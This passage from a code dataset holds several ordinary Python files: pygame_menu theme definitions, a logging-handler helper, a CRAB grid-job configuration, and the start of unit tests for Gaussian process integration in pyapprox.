OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n-------------------------------------------------------------------------------\n\"\"\"\n\nimport pygame_menu.font\nimport pygame_menu.utils as _utils\nimport pygame_menu.widgets as _widgets\nfrom pygame_menu.baseimage import BaseImage\n\nimport copy\nimport pygame\n\n\nclass Theme(object):\n \"\"\"\n Class defining the visual rendering of menus and widgets.\n\n .. note:: All colors must be defined with a tuple of 3 or 4 numbers in the formats:\n\n - (R,G,B)\n - (R,G,B,A)\n\n Red (R), Green (G) and Blue (B) must be numbers between 0 and 255.\n A means the alpha channel (opacity), if 0 the color is transparent, 100 means opaque.\n\n :param background_color: Menu background color\n :type background_color: tuple, list, :py:class:`pygame_menu.baseimage.BaseImage`\n :param cursor_color: Color of cursor\n :type cursor_color: tuple, list\n :param cursor_selection_color: Selection box color\n :type cursor_selection_color: tuple, list\n :param focus_background_color: Color of the widget focus, this must be a tuple of 4 elements. 
And must be transparent\n :type focus_background_color: tuple, list\n :param menubar_close_button: Draw a back-box button on header to close the menu\n :type menubar_close_button: bool\n :param scrollbar_color: Scrollbars color\n :type scrollbar_color: tuple, list\n :param scrollbar_shadow: Indicate if a shadow is drawn on each scrollbar\n :type scrollbar_shadow: bool\n :param scrollbar_shadow_color: Color of the shadow\n :type scrollbar_shadow_color: tuple, list\n :param scrollbar_shadow_offset: Offset of shadow\n :type scrollbar_shadow_offset: int, float\n :param scrollbar_shadow_position: Position of shadow\n :type scrollbar_shadow_position: str\n :param scrollbar_slider_color: Color of the sliders\n :type scrollbar_slider_color: tuple, list\n :param scrollbar_slider_pad: Space between slider and scrollbars borders\n :type scrollbar_slider_pad: int, float\n :param scrollbar_thick: Scrollbars thickness\n :type scrollbar_thick: int, float\n :param selection_color: Color of the selector widget\n :type selection_color: tuple, list\n :param surface_clear_color: Surface clear color before applying background function\n :type surface_clear_color: tuple, list\n :param title_background_color: Title background color\n :type title_background_color: tuple, list\n :param title_bar_style: Style of the title, use menubar widget styles\n :type title_bar_style: int\n :param title_font: Optional title font, if None use the Menu default font\n :type title_font: str, None\n :param title_font_antialias: Title font renders with antialiasing\n :type title_font_antialias: bool\n :param title_font_color: Title font color, if None use the widget font color\n :type title_font_color: tuple, list, None\n :param title_font_size: Font size of the title\n :type title_font_size: int\n :param title_offset: Offset (x-position,y-position) of title (px). Default (0,0)\n :type title_offset: tuple, list\n :param title_shadow: Enable shadow on title\n :type title_shadow: bool\n :param title_shadow_color: Title shadow color\n :type title_shadow_color: tuple, list\n :param title_shadow_offset: Offset of shadow on title\n :type title_shadow_offset: int, float\n :param title_shadow_position: Position of the shadow on title\n :type title_shadow_position: str\n :param widget_alignment: Widget default alignment\n :type widget_alignment: str\n :param widget_background_color: Background color of a widget\n :type widget_background_color: tuple, list, :py:class:`pygame_menu.baseimage.BaseImage`, None\n :param widget_font: Widget font path or name\n :type widget_font: str\n :param widget_font_antialias: Widget font renders with antialiasing\n :type widget_font_antialias: bool\n :param widget_font_background_color_from_menu: Use menu background color as font background color, True by default in pygame v2\n :type widget_font_background_color_from_menu: bool\n :param widget_font_color: Color of the font\n :type widget_font_color: tuple, list\n :param widget_font_size: Font size\n :type widget_font_size: int\n :param widget_margin: Horizontal and vertical margin of each element in Menu (px). Default (0, 10)\n :type widget_margin: tuple, list\n :param widget_offset: X,Y axis offset of widgets inside Menu (px). If value less than 1 use percentage of width/height. 
Default *(0, 0)*\n :type widget_offset: tuple, list\n :param widget_selection_effect: Widget selection effect object\n :type widget_selection_effect: :py:class:`pygame_menu.widgets.core.Selection`\n :param widget_shadow: Indicate if a shadow is drawn on each widget\n :type widget_shadow: bool\n :param widget_shadow_color: Color of the shadow\n :type widget_shadow_color: tuple, list\n :param widget_shadow_offset: Offset of shadow\n :type widget_shadow_offset: int, float\n :param widget_shadow_position: Position of shadow\n :type widget_shadow_position: str\n \"\"\"\n\n def __init__(self, **kwargs):\n self.background_color = self._get(kwargs, 'background_color',\n 'color_image', (220, 220, 220)) # type: tuple\n self.cursor_color = self._get(kwargs, 'cursor_color',\n 'color', (0, 0, 0)) # type: tuple\n self.cursor_selection_color = self._get(kwargs, 'cursor_selection_color',\n 'color', (30, 30, 30, 120)) # type: tuple\n self.focus_background_color = self._get(kwargs, 'focus_background_color',\n 'color', (0, 0, 0, 180)) # type: tuple\n self.menubar_close_button = self._get(kwargs, 'menubar_close_button',\n bool, True) # type: bool\n self.scrollbar_color = self._get(kwargs, 'scrollbar_color',\n 'color', (220, 220, 220)) # type: tuple\n self.scrollbar_shadow = self._get(kwargs, 'scrollbar_shadow',\n bool, False) # type: bool\n self.scrollbar_shadow_color = self._get(kwargs, 'scrollbar_shadow_color',\n 'color', (0, 0, 0)) # type: bool\n self.scrollbar_shadow_offset = self._get(kwargs, 'scrollbar_shadow_offset',\n (int, float), 2) # type: (int, float)\n self.scrollbar_shadow_position = self._get(kwargs, 'scrollbar_shadow_position',\n 'position', pygame_menu.locals.POSITION_NORTHWEST) # type: str\n self.scrollbar_slider_color = self._get(kwargs, 'scrollbar_slider_color',\n 'color', (200, 200, 200)) # type: tuple\n self.scrollbar_slider_pad = self._get(kwargs, 'scrollbar_slider_pad',\n (int, float), 0) # type: (int,float)\n self.scrollbar_thick = self._get(kwargs, 'scrollbar_thick',\n (int, float), 20) # type: (int,float)\n self.selection_color = self._get(kwargs, 'selection_color',\n 'color', (255, 255, 255)) # type: tuple\n self.surface_clear_color = self._get(kwargs, 'surface_clear_color',\n 'color', (0, 0, 0)) # type: tuple\n self.title_background_color = self._get(kwargs, 'title_background_color',\n 'color', (70, 70, 70)) # type: tuple\n self.title_bar_style = self._get(kwargs, 'title_bar_style',\n int, _widgets.MENUBAR_STYLE_ADAPTIVE) # type: int\n self.title_font = self._get(kwargs, 'title_font',\n str, pygame_menu.font.FONT_OPEN_SANS) # type: str\n self.title_font_antialias = self._get(kwargs, 'title_font_antialias',\n bool, True) # type: bool\n self.title_font_color = self._get(kwargs, 'title_font_color',\n 'color', (220, 220, 220)) # type: tuple\n self.title_font_size = self._get(kwargs, 'title_font_size',\n int, 40) # type: int\n self.title_offset = self._get(kwargs, 'title_offset',\n 'tuple2', (5, 0)) # type: tuple\n self.title_shadow = self._get(kwargs, 'title_shadow',\n bool, False) # type: bool\n self.title_shadow_color = self._get(kwargs, 'title_shadow_color',\n 'color', (0, 0, 0)) # type: tuple\n self.title_shadow_offset = self._get(kwargs, 'title_shadow_offset',\n (int, float), 2) # type: (int,float)\n self.title_shadow_position = self._get(kwargs, 'title_shadow_position',\n 'position', pygame_menu.locals.POSITION_NORTHWEST) # type: str\n self.widget_font = self._get(kwargs, 'widget_font',\n str, pygame_menu.font.FONT_OPEN_SANS) # type: str\n self.widget_alignment = 
self._get(kwargs, 'widget_alignment',\n                                          'alignment', pygame_menu.locals.ALIGN_CENTER)  # type: str\n        self.widget_background_color = self._get(kwargs, 'widget_background_color',\n                                                 'color_image_none')  # type: (tuple, type(None))\n        self.widget_background_inflate = self._get(kwargs, 'background_inflate',\n                                                   'tuple2', (16, 8))  # type: tuple\n        self.widget_font_antialias = self._get(kwargs,\n                                               'widget_font_antialias',\n                                               bool, True)  # type: bool\n        self.widget_font_background_color_from_menu = self._get(kwargs,\n                                                                'widget_font_background_color_from_menu',\n                                                                bool, pygame.vernum.major == 2)  # type: bool\n        self.widget_font_color = self._get(kwargs, 'widget_font_color',\n                                           'color', (70, 70, 70))  # type: tuple\n        self.widget_font_size = self._get(kwargs, 'widget_font_size',\n                                          int, 30)  # type: int\n        self.widget_margin = self._get(kwargs, 'widget_margin',\n                                       'tuple2', (0, 10))  # type: tuple\n        self.widget_offset = self._get(kwargs, 'widget_offset',\n                                       'tuple2', (0, 0))  # type: tuple\n        self.widget_selection_effect = self._get(kwargs, 'widget_selection_effect',\n                                                 _widgets.core.Selection,\n                                                 _widgets.HighlightSelection())  # type: _widgets.core.Selection\n        self.widget_shadow = self._get(kwargs, 'widget_shadow',\n                                       bool, False)  # type: bool\n        self.widget_shadow_color = self._get(kwargs, 'widget_shadow_color',\n                                             'color', (0, 0, 0))  # type: tuple\n        self.widget_shadow_offset = self._get(kwargs, 'widget_shadow_offset',\n                                              (int, float), 2)  # type: (int,float)\n        self.widget_shadow_position = self._get(kwargs, 'widget_shadow_position',\n                                                'position', pygame_menu.locals.POSITION_NORTHWEST)  # type: str\n\n        # At this point no kwargs should remain; raise an exception if any do\n        for invalid_keyword in kwargs.keys():\n            msg = 'parameter Theme.{} does not exist'.format(invalid_keyword)\n            raise ValueError(msg)\n\n    def validate(self):\n        \"\"\"\n        Validate the values of the theme. If there is an invalid parameter an\n        AssertionError is raised.\n\n        This function also converts all lists to tuples. This is done because lists\n        are mutable.\n\n        :return: None\n        \"\"\"\n\n        # Size asserts\n        assert self.scrollbar_thick > 0, 'scrollbar thickness must be greater than zero'\n        assert self.scrollbar_shadow_offset > 0, 'scrollbar shadow offset must be greater than zero'\n        assert self.title_font_size > 0, 'title font size must be greater than zero'\n        assert self.widget_font_size > 0, 'widget font size must be greater than zero'\n        assert self.widget_shadow_offset > 0, 'widget shadow offset must be greater than zero'\n        assert self.widget_offset[0] >= 0 and self.widget_offset[1] >= 0, \\\n            'widget offset must be greater than or equal to zero'\n\n        # Format colors, this converts all color lists to tuples automatically\n        self.background_color = self._format_opacity(self.background_color)\n        self.cursor_color = self._format_opacity(self.cursor_color)\n        self.cursor_selection_color = self._format_opacity(self.cursor_selection_color)\n        self.focus_background_color = self._format_opacity(self.focus_background_color)\n        self.scrollbar_color = self._format_opacity(self.scrollbar_color)\n        self.scrollbar_shadow_color = self._format_opacity(self.scrollbar_shadow_color)\n        self.scrollbar_slider_color = self._format_opacity(self.scrollbar_slider_color)\n        self.selection_color = self._format_opacity(self.selection_color)\n        self.surface_clear_color = self._format_opacity(self.surface_clear_color)\n        self.title_background_color = self._format_opacity(self.title_background_color)\n        self.title_font_color = self._format_opacity(self.title_font_color)\n        self.title_shadow_color = self._format_opacity(self.title_shadow_color)\n        self.widget_background_color = self._format_opacity(self.widget_background_color)\n        self.widget_font_color = self._format_opacity(self.widget_font_color)\n\n        # List to tuple\n        self.title_offset = self._vec_2tuple(self.title_offset)\n        self.widget_background_inflate = self._vec_2tuple(self.widget_background_inflate)\n        self.widget_margin = self._vec_2tuple(self.widget_margin)\n        self.widget_offset = self._vec_2tuple(self.widget_offset)\n\n        # Configs\n        self.widget_selection_effect.set_color(self.selection_color)\n\n        # Color asserts\n        assert self.focus_background_color[3] != 0, \\\n            'focus background color cannot be fully transparent, suggested opacity between 1 and 255'\n\n    def set_background_color_opacity(self, opacity):\n        \"\"\"\n        Modify menu background color with given opacity.\n\n        :param opacity: Opacity value, from 0 (transparent) to 1 (opaque)\n        :type opacity: int, float\n        :return: None\n        \"\"\"\n        assert isinstance(opacity, (int, float))\n        assert 0 <= opacity <= 1, 'Opacity must be a number between 0 (transparent) and 1 (opaque)'\n        self.background_color = (self.background_color[0], self.background_color[1],\n                                 self.background_color[2], int(opacity * 255))\n\n    @staticmethod\n    def _vec_2tuple(obj):\n        \"\"\"\n        Return a tuple from a list or tuple object.\n\n        :param obj: Object\n        :type obj: list, tuple\n        :return: Tuple\n        :rtype: tuple\n        \"\"\"\n        if isinstance(obj, tuple):\n            return obj\n        elif isinstance(obj, list):\n            return obj[0], obj[1]\n        else:\n            raise ValueError('object is not a 2 vector')\n\n    def copy(self):\n        \"\"\"\n        Creates a deep copy of the object.\n\n        :return: Copied theme\n        :rtype: Theme\n        \"\"\"\n        return copy.deepcopy(self)\n\n    @staticmethod\n    def _format_opacity(color):\n        \"\"\"\n        Adds opacity to a 3 channel color. (R,G,B) -> (R,G,B,A) if the color\n        does not have an alpha channel. 
Also updates the opacity to a number between\n 0 and 255.\n\n Color may be an Image, so if this is the case return the same object.\n If the color is a list, return a tuple.\n\n :param color: Color tuple\n :type color: tuple, list\n :return: Color in the same format\n :rtype: tuple, None\n \"\"\"\n if isinstance(color, BaseImage):\n return color\n if color is None:\n return color\n if isinstance(color, (tuple, list)):\n _utils.assert_color(color)\n if len(color) == 4:\n if isinstance(color, tuple):\n return color\n else:\n return color[0], color[1], color[2], color[3]\n elif len(color) == 3:\n color = color[0], color[1], color[2], 255\n else:\n raise ValueError('invalid color type {0}, only tuple or list are valid'.format(color))\n return color\n\n @staticmethod\n def _get(params, key, allowed_types=None, default=None):\n \"\"\"\n Return a value from a dictionary.\n\n :param params: parameters dictionary\n :type params: dict\n :param key: key to look for\n :type key: str\n :param allowed_types: list of allowed types\n :type allowed_types: any\n :param default: default value to return\n :type default: any\n :return: The value associated to the key\n :rtype: any\n \"\"\"\n if key not in params:\n return default\n\n value = params.pop(key)\n if allowed_types:\n if not isinstance(allowed_types, (tuple, list)):\n allowed_types = (allowed_types,)\n for valtype in allowed_types:\n if valtype == 'color':\n _utils.assert_color(value)\n elif valtype == 'color_none':\n if value is None:\n return value\n _utils.assert_color(value)\n elif valtype == 'color_image':\n if isinstance(value, BaseImage):\n return value\n _utils.assert_color(value)\n elif valtype == 'color_image_none':\n if value is None:\n return value\n elif isinstance(value, BaseImage):\n return value\n _utils.assert_color(value)\n elif valtype == 'position':\n _utils.assert_position(value)\n elif valtype == 'alignment':\n _utils.assert_alignment(value)\n elif valtype == 'tuple2':\n _utils.assert_vector2(value)\n\n all_types = ('color', 'color_none', 'color_image', 'color_image_none',\n 'position', 'alignment', 'tuple2')\n others = tuple(t for t in allowed_types if t not in all_types)\n if others:\n msg = 'Theme.{} type shall be in {} types (got {})'.format(key, others, type(value))\n assert isinstance(value, others), msg\n return value\n\n\nTHEME_DEFAULT = Theme()\n\nTHEME_DARK = Theme(\n background_color=(40, 41, 35),\n cursor_color=(255, 255, 255),\n cursor_selection_color=(80, 80, 80, 120),\n scrollbar_color=(39, 41, 42),\n scrollbar_slider_color=(65, 66, 67),\n selection_color=(255, 255, 255),\n title_background_color=(47, 48, 51),\n title_font_color=(215, 215, 215),\n widget_font_color=(200, 200, 200),\n)\n\nTHEME_BLUE = Theme(\n background_color=(228, 230, 246),\n scrollbar_shadow=True,\n scrollbar_slider_color=(150, 200, 230),\n scrollbar_slider_pad=2,\n scrollbar_thick=14,\n selection_color=(100, 62, 132),\n title_background_color=(62, 149, 195),\n title_font_color=(228, 230, 246),\n title_shadow=True,\n widget_font_color=(61, 170, 220),\n)\n\nTHEME_GREEN = Theme(\n background_color=(186, 214, 177),\n scrollbar_slider_color=(125, 121, 114),\n scrollbar_slider_pad=2,\n selection_color=(125, 121, 114),\n title_background_color=(125, 121, 114),\n title_font_color=(228, 230, 246),\n widget_font_color=(255, 255, 255),\n)\n\nTHEME_ORANGE = Theme(\n background_color=(228, 100, 36),\n selection_color=(255, 255, 255),\n title_background_color=(170, 65, 50),\n widget_font_color=(0, 0, 0),\n widget_font_size=30,\n)\n\nTHEME_SOLARIZED = 
Theme(\n background_color=(239, 231, 211),\n cursor_color=(0, 0, 0),\n cursor_selection_color=(146, 160, 160, 120),\n selection_color=(207, 62, 132),\n title_background_color=(4, 47, 58),\n title_font_color=(38, 158, 151),\n widget_font_color=(102, 122, 130),\n)\n","sub_path":"tetris/venv/Lib/site-packages/pygame_menu/themes.py","file_name":"themes.py","file_ext":"py","file_size_in_byte":22083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"9244936","text":"import sys\nimport os\nimport datetime\nimport logging\n\nfrom formatter import file_formatter, console_formatter\n\ndef attach_file_handler(logger: logging.Logger, logging_level: int) -> None:\n\n timestamp = datetime.datetime.utcnow().strftime(\"%Y%m%d\")\n PID = os.getpid()\n _logfile_path = f\"boto3_stream_server_log_{timestamp}.{logging.getLevelName(logging_level)}.log\"\n\n file_handler = logging.FileHandler(_logfile_path)\n file_handler.setFormatter(file_formatter)\n file_handler.setLevel(logging_level)\n\n logger.addHandler(file_handler)\n\ndef attach_console_handler(logger: logging.Logger, logging_level: int) -> None:\n\n console_stderr_handler = logging.StreamHandler(sys.stderr)\n console_stderr_handler.setFormatter(console_formatter)\n console_stderr_handler.setLevel(logging_level)\n \n logger.addHandler(console_stderr_handler)","sub_path":"src/logging/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"196354477","text":"from CRABClient.UserUtilities import config\nconfig = config()\n\nconfig.General.requestName = 'ElectronLooper_test'\nconfig.General.workArea = './'\nconfig.General.transferOutputs = True\nconfig.General.transferLogs = True\n\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = 'pset.py'\nconfig.JobType.scriptExe = 'crabWrapper.sh'\n#config.JobType.inputFiles = ['FrameworkJobReport.xml','ElectronLooper.exe', 'goodruns.txt', 'mc_small.txt', 'mc.txt', 'data.txt']\nconfig.JobType.inputFiles = [ 'mc_small.txt']\nconfig.JobType.outputFiles = ['ntuple.root']\n\nconfig.Data.userInputFiles = open('mc_small.txt').readlines()\nconfig.Data.outputPrimaryDataset = 'ElectronLooper_test'\nconfig.Data.splitting = 'FileBased'\nconfig.Data.unitsPerJob = 1\nconfig.Data.publication = False\nconfig.Data.outputDatasetTag = 'ElectronLooper_test'\n\nconfig.Site.storageSite = '/afs/cern.ch/work/d/diboye/essai/CMSSW_7_6_3/src/ElectronLooper/'\nconfig.Site.whitelist = ['T2_US_*']\n","sub_path":"crab.py","file_name":"crab.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"304698781","text":"import unittest\nfrom pyapprox.gaussian_process import *\nfrom sklearn.gaussian_process.kernels import Matern, WhiteKernel, RBF\nimport pyapprox as pya\nfrom scipy import stats\nfrom scipy.linalg import solve_triangular\nfrom scipy.spatial.distance import cdist\nimport copy\nimport time\n\n\ndef compute_mean_and_variance_of_gaussian_process(gp, length_scale,\n train_samples,\n A_inv, kernel_var,\n train_vals, quad_samples,\n quad_weights):\n # just use for testing purposes\n # computing variance_of_variance requires splitting up terms\n # like done in code so no point computing this quantity as it cannot\n # test if the splitting procedure is correct.\n nvars = quad_samples.shape[0]\n gp_vals, gp_std = gp(quad_samples, return_std=True)\n gp_vals = gp_vals[:, 0]\n mean_of_mean = gp_vals.dot(quad_weights)\n quad_samples_WWXX = pya.get_all_sample_combinations(\n quad_samples, quad_samples)\n quad_weights_WWXX = pya.outer_product([quad_weights]*2)\n\n L = np.linalg.cholesky(A_inv)\n\n ww, xx = quad_samples_WWXX[:nvars], quad_samples_WWXX[nvars:]\n dists_ww_xx = np.sum((ww.T/length_scale-xx.T/length_scale)**2, axis=1)\n dists_ww_tt = cdist(train_samples.T/length_scale, ww.T/length_scale,\n metric='sqeuclidean')\n dists_xx_tt = cdist(train_samples.T/length_scale, xx.T/length_scale,\n metric='sqeuclidean')\n t_ww = np.exp(-.5*dists_ww_tt)\n t_xx = np.exp(-.5*dists_xx_tt)\n prior_cov_ww_xx = kernel_var*np.exp(-.5*dists_ww_xx)\n post_cov_ww_xx = prior_cov_ww_xx - kernel_var*np.sum(\n t_ww.T.dot(L)*t_xx.T.dot(L), axis=1)\n\n variance_of_mean = post_cov_ww_xx.dot(quad_weights_WWXX)\n\n mean_of_variance = (gp_vals**2+gp_std**2).dot(quad_weights) - (\n variance_of_mean+mean_of_mean**2)\n\n return mean_of_mean, variance_of_mean, mean_of_variance\n\n\ndef compute_intermediate_quantities_with_monte_carlo(mu_scalar, sigma_scalar,\n length_scale,\n train_samples,\n A_inv, kernel_var,\n train_vals):\n nsamples_mc = 20000\n nvars = length_scale.shape[0]\n xx = np.random.normal(mu_scalar, sigma_scalar, (nvars, nsamples_mc))\n yy = np.random.normal(mu_scalar, sigma_scalar, (nvars, nsamples_mc))\n zz = np.random.normal(mu_scalar, sigma_scalar, (nvars, nsamples_mc))\n dists_xx_tt = cdist(train_samples.T/length_scale, xx.T/length_scale,\n metric='sqeuclidean')\n dists_yy_tt = cdist(train_samples.T/length_scale, yy.T/length_scale,\n metric='sqeuclidean')\n dists_zz_tt = cdist(train_samples.T/length_scale, zz.T/length_scale,\n metric='sqeuclidean')\n dists_xx_yy = np.sum((xx.T/length_scale-yy.T/length_scale)**2, axis=1)\n dists_xx_zz = np.sum((xx.T/length_scale-zz.T/length_scale)**2, axis=1)\n t_xx = np.exp(-.5*dists_xx_tt)\n t_yy = np.exp(-.5*dists_yy_tt)\n t_zz = np.exp(-.5*dists_zz_tt)\n\n mean_gp_xx = t_xx.T.dot(A_inv.dot(train_vals))*kernel_var\n mean_gp_yy = t_yy.T.dot(A_inv.dot(train_vals))*kernel_var\n prior_cov_xx_xx = np.ones((xx.shape[1]))\n L = np.linalg.cholesky(A_inv)\n post_cov_xx_xx = prior_cov_xx_xx - np.sum(\n (t_xx.T.dot(L))**2, axis=1)\n prior_cov_xx_yy = np.exp(-.5*dists_xx_yy)\n post_cov_xx_yy = prior_cov_xx_yy - np.sum(\n t_xx.T.dot(L)*t_yy.T.dot(L), axis=1)\n # assert np.allclose(np.sum(\n # t_xx.T.dot(L)*t_yy.T.dot(L),axis=1),np.diag(t_xx.T.dot(A_inv).dot(t_yy)))\n prior_cov_xx_zz = np.exp(-.5*dists_xx_zz)\n post_cov_xx_zz = prior_cov_xx_zz - np.sum(\n t_xx.T.dot(L)*t_zz.T.dot(L), axis=1)\n\n eta_mc = mean_gp_xx.mean()\n varrho_mc = (mean_gp_xx*post_cov_xx_yy).mean()\n phi_mc = (mean_gp_xx*mean_gp_yy*post_cov_xx_yy).mean()\n CC_mc = 
(post_cov_xx_yy*post_cov_xx_zz).mean()\n chi_mc = (post_cov_xx_yy**2).mean()\n M_sq_mc = (mean_gp_xx**2).mean()\n v_sq_mc = (post_cov_xx_xx).mean()\n varsigma_sq_mc = (post_cov_xx_yy).mean()\n P_mc = (t_xx.dot(t_xx.T))/xx.shape[1]\n lamda_mc = (prior_cov_xx_yy*t_yy).mean(axis=1)\n CC1_mc = (prior_cov_xx_yy*prior_cov_xx_zz).mean()\n Pi_mc = np.zeros((train_samples.shape[1], train_samples.shape[1]))\n for ii in range(train_samples.shape[1]):\n for jj in range(ii, train_samples.shape[1]):\n Pi_mc[ii, jj] = (prior_cov_xx_yy*t_xx[ii, :]*t_yy[jj, :]).mean()\n Pi_mc[jj, ii] = Pi_mc[ii, jj]\n\n return eta_mc, varrho_mc, phi_mc, CC_mc, chi_mc, M_sq_mc, v_sq_mc, \\\n varsigma_sq_mc, P_mc, lamda_mc, CC1_mc, Pi_mc\n\n\ndef verify_quantities(reference_quantities, quantities, tols):\n assert len(reference_quantities) == len(quantities) == len(tols)\n ii = 0\n for q_ref, q, tol in zip(reference_quantities, quantities, tols):\n assert np.allclose(q_ref, q, rtol=tol), (ii, q_ref, q, tol)\n ii += 1\n\n\nclass TestGaussianProcess(unittest.TestCase):\n def setUp(self):\n np.random.seed(1)\n\n def test_gaussian_process_pointwise_variance(self):\n nvars = 1\n lb, ub = 0, 1\n ntrain_samples = 5\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples)]*nvars)\n train_vals = func(train_samples)\n\n kernel = Matern(0.4, length_scale_bounds='fixed', nu=np.inf)\n kernel = ConstantKernel(\n constant_value=2., constant_value_bounds='fixed')*kernel\n kernel += WhiteKernel(noise_level=1e-5, noise_level_bounds='fixed')\n gp = GaussianProcess(kernel)\n\n gp.fit(train_samples, train_vals)\n\n samples = np.random.uniform(0, 1, (nvars, 100))\n pred_vals, stdev1 = gp(samples, return_std=True)\n\n variance2 = gaussian_process_pointwise_variance(\n kernel, samples, train_samples)\n\n assert np.allclose(stdev1**2, variance2)\n\n def test_integrate_gaussian_process_gaussian(self):\n\n nvars = 2\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n mu_scalar, sigma_scalar = 3, 1\n # mu_scalar, sigma_scalar = 0, 1\n\n univariate_variables = [stats.norm(mu_scalar, sigma_scalar)]*nvars\n variable = pya.IndependentMultivariateRandomVariable(\n univariate_variables)\n\n lb, ub = univariate_variables[0].interval(0.99999)\n\n ntrain_samples = 5\n # ntrain_samples = 20\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples)]*nvars)\n train_vals = func(train_samples)\n\n nu = np.inf\n nvars = train_samples.shape[0]\n length_scale = np.array([1]*nvars)\n kernel = Matern(length_scale, length_scale_bounds=(1e-2, 10), nu=nu)\n # fix kernel variance\n kernel = ConstantKernel(\n constant_value=2., constant_value_bounds='fixed')*kernel\n # optimize kernel variance\n # kernel = ConstantKernel(\n # constant_value=3,constant_value_bounds=(0.1, 10))*kernel\n # optimize gp noise\n # kernel += WhiteKernel(noise_level_bounds=(1e-8, 1))\n # fix gp noise\n kernel += WhiteKernel(noise_level=1e-5, noise_level_bounds='fixed')\n # white kernel K(x_i,x_j) is only nonzeros when x_i=x_j, i.e.\n # it is not used when calling gp.predict\n gp = GaussianProcess(kernel, n_restarts_optimizer=10)\n gp.fit(train_samples, train_vals)\n # print(gp.kernel_)\n\n # xx=np.linspace(lb,ub,101)\n # plt.plot(xx,func(xx[np.newaxis,:]))\n # gp_mean,gp_std = gp(xx[np.newaxis,:],return_std=True)\n # gp_mean = gp_mean[:,0]\n # plt.plot(xx,gp_mean)\n # plt.plot(train_samples[0,:],train_vals[:,0],'o')\n # plt.fill_between(xx,gp_mean-2*gp_std,gp_mean+2*gp_std,alpha=0.5)\n # 
plt.show()\n\n import time\n t0 = time.time()\n expected_random_mean, variance_random_mean, expected_random_var,\\\n variance_random_var, intermediate_quantities =\\\n integrate_gaussian_process(gp, variable, return_full=True)\n print('time', time.time()-t0)\n\n # mu and sigma should match variable\n kernel_types = [Matern]\n kernel = extract_covariance_kernel(gp.kernel_, kernel_types)\n length_scale = np.atleast_1d(kernel.length_scale)\n constant_kernel = extract_covariance_kernel(\n gp.kernel_, [ConstantKernel])\n if constant_kernel is not None:\n kernel_var = constant_kernel.constant_value\n else:\n kernel_var = 1\n\n Kinv_y = gp.alpha_\n mu = np.array([mu_scalar]*nvars)[:, np.newaxis]\n sigma = np.array([sigma_scalar]*nvars)[:, np.newaxis]\n # Notes sq exp kernel is exp(-dists/delta). Sklearn RBF kernel is\n # exp(-.5*dists/L**2)\n delta = 2*length_scale[:, np.newaxis]**2\n\n # Kinv_y is inv(kernel_var*A).dot(y). Thus multiply by kernel_var to\n # get formula in notes\n Ainv_y = Kinv_y*kernel_var\n L_inv = solve_triangular(gp.L_.T, np.eye(gp.L_.shape[0]), lower=False)\n K_inv = L_inv.dot(L_inv.T)\n # K_inv is inv(kernel_var*A). Thus multiply by kernel_var to get A_inv\n A_inv = K_inv*kernel_var\n\n # Verify quantities used to compute mean and variance of mean of GP\n # This is redundant know but helped to isolate incorrect terms\n # when initialing writing tests\n tau_true = gaussian_tau(train_samples, delta, mu, sigma)\n u_true = gaussian_u(delta, sigma)\n varpi_true = compute_varpi(tau_true, A_inv)\n varsigma_sq_true = compute_varsigma_sq(u_true, varpi_true)\n verify_quantities(\n [tau_true, u_true, varpi_true, varsigma_sq_true],\n intermediate_quantities[:4], [1e-8]*4)\n\n # Verify mean and variance of mean of GP\n true_expected_random_mean = tau_true.dot(Ainv_y)\n true_variance_random_mean = variance_of_mean(\n kernel_var, varsigma_sq_true)\n assert np.allclose(\n true_expected_random_mean, expected_random_mean)\n # print(true_variance_random_mean,variance_random_mean)\n assert np.allclose(\n true_variance_random_mean, variance_random_mean)\n\n # Verify quantities used to compute mean of variance of GP\n # This is redundant know but helped to isolate incorrect terms\n # when initialing writing tests\n P_true = gaussian_P(train_samples, delta, mu, sigma)\n v_sq_true = compute_v_sq(A_inv, P_true)\n zeta_true = compute_zeta(train_vals, A_inv, P_true)\n verify_quantities(\n [P_true, v_sq_true], intermediate_quantities[4:6], [1e-8]*2)\n\n true_expected_random_var = mean_of_variance(\n zeta_true, v_sq_true, kernel_var, true_expected_random_mean,\n true_variance_random_mean)\n assert np.allclose(true_expected_random_var, expected_random_var)\n\n # Verify quantities used to compute variance of variance of GP\n # This is redundant know but helped to isolate incorrect terms\n # when initialing writing tests\n nu_true = gaussian_nu(delta, sigma)\n varphi_true = compute_varphi(A_inv, P_true)\n Pi_true = gaussian_Pi(train_samples, delta, mu, sigma)\n psi_true = compute_psi(A_inv, Pi_true)\n chi_true = compute_chi(nu_true, varphi_true, psi_true)\n phi_true = compute_phi(train_vals, A_inv, Pi_true, P_true)\n lamda_true = gaussian_lamda(train_samples, delta, mu, sigma)\n varrho_true = compute_varrho(\n lamda_true, A_inv, train_vals, P_true, tau_true)\n xi_1_true = gaussian_xi_1(delta, sigma)\n xi_true = compute_xi(xi_1_true, lamda_true, tau_true, P_true, A_inv)\n verify_quantities(\n [zeta_true, nu_true, varphi_true, Pi_true, psi_true, chi_true,\n phi_true, lamda_true, varrho_true, xi_1_true, 
